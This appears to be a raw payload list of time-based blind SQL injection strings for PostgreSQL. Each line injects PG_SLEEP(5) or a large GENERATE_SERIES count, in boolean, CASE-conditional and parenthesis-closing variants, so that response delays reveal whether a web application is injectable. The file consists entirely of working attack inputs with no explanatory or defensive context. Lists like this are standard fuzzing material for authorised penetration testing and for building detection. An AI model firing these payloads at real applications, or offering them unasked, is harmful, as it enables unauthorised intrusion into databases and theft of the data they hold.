AND 8754=(SELECT 8754 FROM PG_SLEEP(5))
OR 8754=(SELECT 8754 FROM PG_SLEEP(5))
AND 8754=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))
OR 8754=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))
(SELECT 8754 FROM PG_SLEEP(5))
(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))
,(SELECT (CASE WHEN (8976=8976) THEN (SELECT 8976 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (8976=8976) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) ELSE 1/(SELECT 0) END))
AND 8754=(SELECT 8754 FROM PG_SLEEP(5))
) OR 8754=(SELECT 8754 FROM PG_SLEEP(5)) AND (8288=8288
) AND 8754=(SELECT 8754 FROM PG_SLEEP(5)) AND (8288=8288
) AND 8754=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND (8288=8288
) AND 8754=(SELECT 5679 FROM PG_SLEEP(5)) AND (8288=8288